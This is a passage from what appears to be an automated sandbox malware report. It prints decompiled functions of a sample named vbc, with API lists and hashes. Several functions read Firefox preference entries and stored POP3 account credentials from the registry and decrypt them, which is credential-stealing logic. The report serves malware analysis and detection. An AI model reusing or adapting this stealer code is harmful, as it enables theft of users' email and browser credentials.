                                                                                                                                                                        • ReleaseDC.USER32 ref: 004064E4
                                                                                                                                                                        • GetWindowRect.USER32 ref: 004064F1
                                                                                                                                                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00406536
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1999381814-0
                                                                                                                                                                        • Opcode ID: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                        • Instruction ID: ba7d715333d017d2103329686637bd52cca5eef1020c3fd7483cce7c10731540
                                                                                                                                                                        • Opcode Fuzzy Hash: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                        • Instruction Fuzzy Hash: 1011A232A00219AFDF109FB8DC09BEF7FB9EB44351F054135EE06E3290DA70A9418A90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406073 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E00406073(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                                                                                                                                        0x00406074
                                                                                                                                                                        0x00406079
                                                                                                                                                                        0x0040607b
                                                                                                                                                                        0x00406083
                                                                                                                                                                        0x0040608e
                                                                                                                                                                        0x0040608e
                                                                                                                                                                        0x0040609d
                                                                                                                                                                        0x004060a1
                                                                                                                                                                        0x004060ad
                                                                                                                                                                        0x004060b6
                                                                                                                                                                        0x004060bf
                                                                                                                                                                        0x004060c9
                                                                                                                                                                        0x004060cb
                                                                                                                                                                        0x004060cb
                                                                                                                                                                        0x004060ce
                                                                                                                                                                        0x004060cf
                                                                                                                                                                        0x004060d9

                                                                                                                                                                        APIs
                                                                                                                                                                        • EmptyClipboard.USER32(?,?,0040AFC1,?), ref: 0040607B
                                                                                                                                                                        • strlen.MSVCRT ref: 00406088
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AFC1,?), ref: 00406097
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 004060A4
                                                                                                                                                                        • memcpy.MSVCRT ref: 004060AD
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004060B6
                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004060BF
                                                                                                                                                                        • CloseClipboard.USER32(?,?,0040AFC1,?), ref: 004060CF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3116012682-0
                                                                                                                                                                        • Opcode ID: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                        • Instruction ID: d09f43d2fefddb7d7ea69405cde3b0bd2fff4912bca4764858ce7f0ae225efb5
                                                                                                                                                                        • Opcode Fuzzy Hash: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                        • Instruction Fuzzy Hash: 09F090371402296BC2102FA4BC4CE9B7FACDF88B56B058139FA0AD2251DE74894486A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040C70B Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E0040C70B(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406BA3(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E0040692F(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E00406A01(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x413b10);
						_t60 = 0xb;
						_t14 = E00406A01(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E00406A01(_t61 + 1, 0x413b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E00406A01(_t17, 0x413b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E00406A01(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E00406A01(_t20, 0x413b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E0040692F(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                                                                                                                                        0x0040c726
                                                                                                                                                                        0x0040c72c
                                                                                                                                                                        0x0040c73a
                                                                                                                                                                        0x0040c740
                                                                                                                                                                        0x0040c74e
                                                                                                                                                                        0x0040c754
                                                                                                                                                                        0x0040c75c
                                                                                                                                                                        0x0040c762
                                                                                                                                                                        0x0040c771
                                                                                                                                                                        0x0040c777
                                                                                                                                                                        0x0040c77a
                                                                                                                                                                        0x0040c783
                                                                                                                                                                        0x0040c78a
                                                                                                                                                                        0x0040c797
                                                                                                                                                                        0x0040c79e
                                                                                                                                                                        0x0040c79f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c7aa
                                                                                                                                                                        0x0040c7ad
                                                                                                                                                                        0x0040c7ba
                                                                                                                                                                        0x0040c7ba
                                                                                                                                                                        0x0040c7bf
                                                                                                                                                                        0x0040c7c2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c7d9
                                                                                                                                                                        0x0040c7db
                                                                                                                                                                        0x0040c7eb
                                                                                                                                                                        0x0040c7f6
                                                                                                                                                                        0x0040c83c
                                                                                                                                                                        0x0040c83f
                                                                                                                                                                        0x0040c844
                                                                                                                                                                        0x0040c849
                                                                                                                                                                        0x0040c84c
                                                                                                                                                                        0x0040c850
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c852
                                                                                                                                                                        0x0040c864
                                                                                                                                                                        0x0040c869
                                                                                                                                                                        0x0040c871
                                                                                                                                                                        0x0040c878
                                                                                                                                                                        0x0040c881
                                                                                                                                                                        0x0040c886
                                                                                                                                                                        0x0040c88b
                                                                                                                                                                        0x0040c89c
                                                                                                                                                                        0x0040c8a4
                                                                                                                                                                        0x0040c8a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c8a8
                                                                                                                                                                        0x0040c7f8
                                                                                                                                                                        0x0040c805
                                                                                                                                                                        0x0040c808
                                                                                                                                                                        0x0040c809
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c80f
                                                                                                                                                                        0x0040c821
                                                                                                                                                                        0x0040c826
                                                                                                                                                                        0x0040c82e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c8aa
                                                                                                                                                                        0x0040c8b8
                                                                                                                                                                        0x0040c8c0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040c8c7
                                                                                                                                                                        0x0040c8cb

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                        • String ID: user_pref("
                                                                                                                                                                        • API String ID: 765841271-2487180061
                                                                                                                                                                        • Opcode ID: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                                                                                                                                                                        • Instruction ID: c71e9d7c33fd880144b5893e014edb1d15ca38a86f0d2a268660e68eb467e50f
                                                                                                                                                                        • Opcode Fuzzy Hash: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                                                                                                                                                                        • Instruction Fuzzy Hash: 134168769041199ADB14EB95DCC0EDA77AC9F44314F1083BBE605F7181EA389F49CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004055A9 Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			E004055A9(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E0040492F(0x41344f, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048C0(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E00404978( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CF3(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                                                                                                                                        0x004055b5
                                                                                                                                                                        0x004055c0
                                                                                                                                                                        0x004055d6
                                                                                                                                                                        0x004055d9
                                                                                                                                                                        0x004055e6
                                                                                                                                                                        0x004055e8
                                                                                                                                                                        0x004055f4
                                                                                                                                                                        0x004055f8
                                                                                                                                                                        0x004055fd
                                                                                                                                                                        0x004055fe
                                                                                                                                                                        0x004055ff
                                                                                                                                                                        0x00405609
                                                                                                                                                                        0x0040560a
                                                                                                                                                                        0x0040560f
                                                                                                                                                                        0x00405612
                                                                                                                                                                        0x00405617
                                                                                                                                                                        0x0040561c
                                                                                                                                                                        0x0040561f
                                                                                                                                                                        0x00405622
                                                                                                                                                                        0x00405625
                                                                                                                                                                        0x004056ff
                                                                                                                                                                        0x00405701
                                                                                                                                                                        0x00405707
                                                                                                                                                                        0x0040571c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040562b
                                                                                                                                                                        0x0040562b
                                                                                                                                                                        0x0040562b
                                                                                                                                                                        0x0040562e
                                                                                                                                                                        0x00405631
                                                                                                                                                                        0x00405637
                                                                                                                                                                        0x00405642
                                                                                                                                                                        0x00405656
                                                                                                                                                                        0x0040565c
                                                                                                                                                                        0x0040566a
                                                                                                                                                                        0x00405673
                                                                                                                                                                        0x0040567d
                                                                                                                                                                        0x0040568a
                                                                                                                                                                        0x00405695
                                                                                                                                                                        0x00405697
                                                                                                                                                                        0x004056a0
                                                                                                                                                                        0x004056a1
                                                                                                                                                                        0x004056a6
                                                                                                                                                                        0x004056a7
                                                                                                                                                                        0x004056af
                                                                                                                                                                        0x004056b1
                                                                                                                                                                        0x004056c3
                                                                                                                                                                        0x004056c8
                                                                                                                                                                        0x004056cd
                                                                                                                                                                        0x004056dd
                                                                                                                                                                        0x004056dd
                                                                                                                                                                        0x004056cd
                                                                                                                                                                        0x00405695
                                                                                                                                                                        0x004056e0
                                                                                                                                                                        0x004056e3
                                                                                                                                                                        0x004056e6
                                                                                                                                                                        0x004056ea
                                                                                                                                                                        0x004056f3
                                                                                                                                                                        0x004056f6
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004055C0
                                                                                                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055D9
                                                                                                                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055E6
                                                                                                                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055F2
                                                                                                                                                                        • memset.MSVCRT ref: 0040565C
                                                                                                                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 0040568D
                                                                                                                                                                        • SetFocus.USER32(?), ref: 00405712
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4281309102-0
                                                                                                                                                                        • Opcode ID: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
                                                                                                                                                                        • Instruction ID: 7cc6a8daf3229b7d8e0d7717536759f0385f0427a9067e31b35bb84d252c6e93
                                                                                                                                                                        • Opcode Fuzzy Hash: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D414BB5D00109BFDB209F98DC85DAEBBB9EF04358F00846AE914B7291D7759E50CF94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004071D6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E004071D6(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v12;
				short* _v16;
				unsigned int _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040F214(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046E1( &_v1584);
				if(E004047AA( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					if(E0040481B(_t67,  &_v28, 0,  &_v20) != 0) {
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040F1F1(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040F1F1(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t66 =  &_v1056;
						E004060DA(0xff, _t66, _a12);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047FB( &_v1584);
			}






















                                                                                                                                                                        0x004071d6
                                                                                                                                                                        0x004071f1
                                                                                                                                                                        0x004071f7
                                                                                                                                                                        0x0040720f
                                                                                                                                                                        0x00407216
                                                                                                                                                                        0x0040721c
                                                                                                                                                                        0x00407222
                                                                                                                                                                        0x00407228
                                                                                                                                                                        0x0040722e
                                                                                                                                                                        0x00407236
                                                                                                                                                                        0x00407238
                                                                                                                                                                        0x00407303
                                                                                                                                                                        0x00407303
                                                                                                                                                                        0x0040723e
                                                                                                                                                                        0x00407244
                                                                                                                                                                        0x00407250
                                                                                                                                                                        0x0040725c
                                                                                                                                                                        0x00407262
                                                                                                                                                                        0x00407277
                                                                                                                                                                        0x0040729b
                                                                                                                                                                        0x004072a2
                                                                                                                                                                        0x004072be
                                                                                                                                                                        0x004072d4
                                                                                                                                                                        0x004072dc
                                                                                                                                                                        0x004072e2
                                                                                                                                                                        0x004072f2
                                                                                                                                                                        0x004072f2
                                                                                                                                                                        0x00407277
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004071F7
                                                                                                                                                                          • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                          • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                          • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
                                                                                                                                                                          • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,73AFED80,?), ref: 004072A2
                                                                                                                                                                          • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                          • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                          • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                                                                                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                        • API String ID: 604216836-2190619648
                                                                                                                                                                        • Opcode ID: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                                                                                                                                                                        • Instruction ID: 7a8ee4d7bc4178ad58e78f2f27b608862355488638afca077fa6fa925b8dfb39
                                                                                                                                                                        • Opcode Fuzzy Hash: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                                                                                                                                                                        • Instruction Fuzzy Hash: D8315075A4025DAFCB11EB69CC81ADE7BBCEB59344F0080B6FA04B3141D6349F598F65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408065 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 41%
                                                                                                                                                                        			E00408065(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E00412360(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00408065(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4181b4 =  *0x4181b4 + 1;
							_t33 =  *0x4181b4 + 0x11558;
							__eflags =  *0x4181b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E0040802D(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                                                                                                                                        0x00408065
                                                                                                                                                                        0x00408068
                                                                                                                                                                        0x00408070
                                                                                                                                                                        0x0040807a
                                                                                                                                                                        0x00408082
                                                                                                                                                                        0x00408086
                                                                                                                                                                        0x0040808a
                                                                                                                                                                        0x0040814f
                                                                                                                                                                        0x00408154
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408090
                                                                                                                                                                        0x00408090
                                                                                                                                                                        0x0040809b
                                                                                                                                                                        0x004080a0
                                                                                                                                                                        0x004080a7
                                                                                                                                                                        0x004080b6
                                                                                                                                                                        0x004080be
                                                                                                                                                                        0x004080c6
                                                                                                                                                                        0x004080ce
                                                                                                                                                                        0x004080d2
                                                                                                                                                                        0x004080d6
                                                                                                                                                                        0x004080de
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004080e4
                                                                                                                                                                        0x0040812e
                                                                                                                                                                        0x0040812e
                                                                                                                                                                        0x00408132
                                                                                                                                                                        0x00408134
                                                                                                                                                                        0x00408135
                                                                                                                                                                        0x00408139
                                                                                                                                                                        0x0040813c
                                                                                                                                                                        0x00408141
                                                                                                                                                                        0x00408141
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408132
                                                                                                                                                                        0x004080ed
                                                                                                                                                                        0x004080f6
                                                                                                                                                                        0x004080f8
                                                                                                                                                                        0x004080f8
                                                                                                                                                                        0x004080fe
                                                                                                                                                                        0x00408102
                                                                                                                                                                        0x00408107
                                                                                                                                                                        0x00408111
                                                                                                                                                                        0x0040811c
                                                                                                                                                                        0x0040811c
                                                                                                                                                                        0x00408109
                                                                                                                                                                        0x00408109
                                                                                                                                                                        0x00408109
                                                                                                                                                                        0x00408109
                                                                                                                                                                        0x00408107
                                                                                                                                                                        0x00408127
                                                                                                                                                                        0x0040812d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408144
                                                                                                                                                                        0x00408144
                                                                                                                                                                        0x00408145
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                        • String ID: 0$6
                                                                                                                                                                        • API String ID: 2300387033-3849865405
                                                                                                                                                                        • Opcode ID: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                                                                                                                                                                        • Instruction ID: 51172b8e10bed5c2f97a320ed5cd446e6bfcd9d4694fda0f565c00a2b2434e31
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 7821D171108384AFC710CF65C981A9BB7E8FF88348F04453EF6C4AA280DB79D955CB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004044E4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                        			E004044E4(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E00402197( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060DA(_t44,  &_v796);
				E004060DA(_t44,  &_v408, _t58 + 0x204);
				E004060DA(_t44,  &_v928, _t58 + 4);
